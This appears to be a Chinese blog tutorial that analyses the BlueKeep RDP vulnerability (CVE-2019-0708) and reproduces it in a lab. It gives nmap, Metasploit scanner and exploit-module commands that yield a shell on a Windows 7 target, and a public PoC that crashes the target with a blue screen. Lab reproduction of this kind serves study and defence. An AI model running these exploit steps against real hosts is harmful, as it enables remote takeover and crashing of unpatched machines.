CVE-2019-0708(BlueKeep)漏洞分析与复现
文章目录
- 一、 漏洞简介
- 1、漏洞介绍:
- 2、漏洞原理:
- 3、影响版本:
- 二、 漏洞复现
- 复现环境:
- 复现过程:
- 1、主机发现:
- 2、使用MSF的漏洞模块:
- 3、对靶机进行漏洞扫描:
- 4、使用攻击模块,对靶机进行攻击
- 5、使用POC,进行蓝屏攻击
一、 漏洞简介
1、漏洞介绍:
2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。
2、漏洞原理:
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。
3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:
Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP
Windows 8 和 windows10 以及之后的版本不受此漏洞影响
二、 漏洞复现
复现环境:
攻击机:Linux kali(IP:192.168.50.130)
靶机:Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)
条件:两台机子可以相互ping通,并且靶机(无补丁)开启了3389端口,防火墙是关闭的!
复现过程:
1、主机发现:
登录 kali linux,用 nmap 探测本网段存活主机
nmap 192.168.50.0/24
可以看到靶机的3389端口是开放的。
2、使用MSF的漏洞模块:
打开MSF:msfconsole
搜索 CVE-2019-0708 漏洞模块
search cve-2019-0708
得到两个模块,一个是扫描功能,一个是攻击功能。
3、对靶机进行漏洞扫描:
使用模块:
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
设置目标IP或网段:
set rhosts 192.168.50.132
执行扫描:run
结果显示靶机存在这个漏洞。
4、使用攻击模块,对靶机进行攻击
使用攻击模块:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
设置攻击目标IP
set rhosts 192.168.50.132
查看当前攻击配置
show options
执行攻击:exploit 或 run
发现攻击失败了,查了一下,知道这里还需要设置 target 参数,指定靶机的安装环境。这里默认是自动识别。
查看 target
show targets
1是真实机器,这里根据真实情况,选择5
set target 5
再次执行攻击
攻击成功!并且得到靶机的shell。
5、使用POC,进行蓝屏攻击
1、下载poc
git clone https://github.com/n1xbyte/cve-2019-0708
2、安装所需要的库
kali里默认没有pip3,先安装pip3,再安装impacket库
apt-get install python3-pippip3 install impacket
3、执行POC攻击
python3 crashpoc.py 192.168.50.132 64 #ip地址 系统版本
成功蓝屏!
CVE-2019-0708(BlueKeep)漏洞分析与复现相关推荐
- MS08-067漏洞分析与复现
一名网络空间安全专业学生所做的漏洞复现实验,如有错误或有待改进的地方,还请大家多多指教. MS08-067漏洞分析与复现 目录 MS08-067漏洞分析与复现 1 前置知识 2 漏洞简介 3 漏洞代码 ...
- java 漏洞复现_CVE-2019-12384漏洞分析及复现
原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 引言 近期关于Jackson的 ...
- CVE-2020-1472 Netlogon特权提升漏洞分析及复现
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新 ...
- Apache Commons Collections反序列化漏洞分析与复现
聚焦源代码安全,网罗国内外最新资讯! 1.1 状态 完成漏洞挖掘条件分析.漏洞复现. 1.2 漏洞分析 存在安全缺陷的版本:Apache Commons Collections3.2.1以下,[JD ...
- Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单.有效.统一的 ...
- ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现
php中文网最新课程 每日17点准时技术干货分享 0x00 前言 ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新 ...
- 一次历史漏洞分析与复现的全部过程
环境需求 系统:Windows10 中间件:https://dlcdn.apache.org/tomcat/tomcat-9/v9.0.58/bin/apache-tomcat-9.0.58-wind ...
- CVE-2017-8464震网3.0漏洞分析与复现
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该 ...
- MS17-010(永恒之蓝)漏洞分析与复现
文章目录 一.漏洞简介 1.永恒之蓝介绍: 2.漏洞原理: 3.影响版本: 二.漏洞复现 复现环境: 复现过程: 1.主机发现: 2.使用MSF的永恒之蓝漏洞模块 3.使用ms17-010扫描模块,对 ...
最新文章
- 【动态规划】最长公共子序列与最长公共子串
- hive 数据迁移SQL
- 增大iphone音量技巧_就算我们把手机音量开到最大!外放声音还是小,那是这个设置没开...
- 【跃迁之路】【429天】程序员高效学习方法论探索系列(实验阶段186-2018.04.10)...
- 零基础学python知乎-编程零基础应当如何开始学习 Python?
- node + ts读取csv文件为二维数组
- 【python】10行代码下载B站弹幕
- 信息论——信源信息量和信息熵
- jsp综合开发实例——夏日九宫格日记网
- 实型变量(浮点型变量)、字符型数据、字符串常量(变量)、字符常量(变量)
- win10系统安装到服务器失败怎么回事,小编教你win10安装失败怎么办
- 嵌入式Linux之正点原子Linux开发板入手
- 渐进式web应用程序_为什么渐进式Web应用程序很棒,以及如何构建一个
- 最实用整理!大数据搜索引擎工具有哪些?
- 阿里云搭建svn服务器
- RTOS的基本概念与线程基础知识
- 疯狂Java讲义(读书笔记)(第五章)
- 腾讯大佬的 Python 编码规范
- FM调制的FPGA实现
- 【xdoj难题集】1202 The Offer - Lunatic(附优化版)
热门文章
- 三十二、VsCode前端的开发工具介绍和使用
- 六十一、Python中的smtplib和email实现邮件发送
- GAN处理手写图片数据集
- django自定义过滤器及模板标签
- ChildTuning:试试把Dropout加到梯度上去?
- 结合随机微分方程,多大Duvenaud团队提出无限深度贝叶斯神经网络
- 谷歌自锤Attention:纯注意力并没那么有用,Transformer组件很重要
- java第六章工具包P6-03.Optional 2020.4.?
- 飞桨抠图直播2020.4.1
- Anaconda安装和使用指南教程:环境管理、包管理、离线安装第三方包